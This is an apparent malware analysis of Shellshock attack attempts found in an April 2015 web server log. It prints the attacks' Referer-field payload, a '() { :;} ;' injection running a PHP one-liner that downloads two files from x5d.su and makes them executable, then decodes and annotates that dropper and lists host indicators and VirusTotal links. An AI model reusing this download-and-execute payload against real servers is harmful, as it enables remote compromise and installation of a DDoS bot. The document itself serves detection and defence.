- /*
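- Example of Shellshock exploitation attempts that try to download the DDoS tool "Linux/Tsunami" from x5d.su (146.155.13.42, Pontificia Universidad Catolica de Chile, although the .su TLD stands for "Soviet Union"?).
- The "() { :;} ;" payload sits in what appears to be the Referer field of these combined-format log lines; the User-Agent field is "-".
- Every request below was answered with 404, which suggests that none of the probed CGI paths existed on this server, so the payload was presumably never handed to bash here.
- The /rom-0 request from 91.217.90.49 carries no such payload and looks like an unrelated probe that happened to arrive in the same time window.
- Log excerpt: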
- */
- [...]
- 188.165.247.42 - - [12/Apr/2015:23:40:37 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:39 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:40 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 404 31292 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 188.165.247.42 - - [12/Apr/2015:23:40:41 +0200] "GET /cgi-bin-sdb/printenv HTTP/1.0" 404 31295 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 91.217.90.49 - - [12/Apr/2015:23:41:35 +0200] "GET /rom-0 HTTP/1.0" 404 31275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
- 27.145.148.119 - - [12/Apr/2015:23:43:47 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 27.145.148.119 - - [12/Apr/2015:23:43:51 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31300 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 202.29.238.196 - - [12/Apr/2015:23:43:52 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 31299 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- 202.29.238.196 - - [12/Apr/2015:23:43:53 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 31301 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/s/susu1\";''$b = \"http://x5d.su/s/susu2\";''$c = sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
- [...]
- --------------
- /*
- Decoded script is:
- (the body of the "php -r" one-liner from the log entries above, with the shell
- quoting and backslash escapes removed and one statement per line)
- The PHP function names are stored in string variables and invoked as variable
- functions ($g(...), $h(...)), so a name such as "system" never appears directly
- in front of a call inside the request.
- The two fopen() calls take http:// URLs, which PHP only honours when
- allow_url_fopen is enabled.
- Indicators visible in this sample: files named susu1 and susu2 in the PHP temp
- directory and HTTP fetches from x5d.su.
- */
- $a = "http://x5d.su/s/susu1"; // remote URL of the first file
- $b = "http://x5d.su/s/susu2"; // remote URL of the second file
- $c = sys_get_temp_dir(); // the system temp directory is the drop location
- $d = "susu1"; // local file name for the first file
- $e = "susu2"; // local file name for the second file
- $f = "chmod 777"; // shell command prefix, used below on both dropped files
- $g = "file_put_contents"; // this and the next three strings are PHP function names called indirectly
- $h = "system";
- $i = "file_exists";
- $j = "fopen";
- if ($i($c . "/$d")){ // file_exists(<tmp>/susu1): is the first file already there?
- exit(1); // yes: stop here, nothing is fetched or run again
- }else{
- echo($c); // prints the temp directory path
- $g("$c/$d", $j("$a", "r")); // file_put_contents(<tmp>/susu1, fopen(<first URL>, "r")): saves the remote file locally
- $g("$c/$e", $j("$b", "r")); // same for susu2
- $h("$f " . $c ."/$d"); // system("chmod 777 <tmp>/susu1")
- $h("$f " . $c ."/$e"); // system("chmod 777 <tmp>/susu2")
- $h($c . "/$d"); // system("<tmp>/susu1"): runs the first dropped file
- $h($c . "/$e"); // system("<tmp>/susu2"): runs the second dropped file
- }
- ----------------------
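- /*
- Translated script is:
- (the decoded script with every variable replaced by its value)
- The temp directory is joined to the file name with "." because PHP does not
- call functions inside a double-quoted string; writing the call inside the quotes
- would describe a literal relative path named "sys_get_temp_dir()/susu1", which
- is not what the decoded script does.
- What to look for on a host: files named susu1 / susu2 in the PHP temp directory,
- outbound HTTP requests to x5d.su, and "php -r" processes that were presumably
- started by the web server's CGI handler.
- */
- if (file_exists(sys_get_temp_dir() . "/susu1")){
- exit(1); // first file already present: the script stops without fetching anything
- }else{
- echo(sys_get_temp_dir()); // prints the temp directory path
- file_put_contents(sys_get_temp_dir() . "/susu1", fopen("http://x5d.su/s/susu1", "r")); // saves the first remote file
- file_put_contents(sys_get_temp_dir() . "/susu2", fopen("http://x5d.su/s/susu2", "r")); // saves the second remote file
- system("chmod 777 " . sys_get_temp_dir() ."/susu1"); // marks both files executable for every user
- system("chmod 777 " . sys_get_temp_dir() ."/susu2");
- system(sys_get_temp_dir() . "/susu1"); // runs both dropped files
- system(sys_get_temp_dir() . "/susu2");
- }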
- Links to Virustotal:
- https://www.virustotal.com/en/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/ (x64) 64b version
- https://www.virustotal.com/en/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/ (i386) 32b version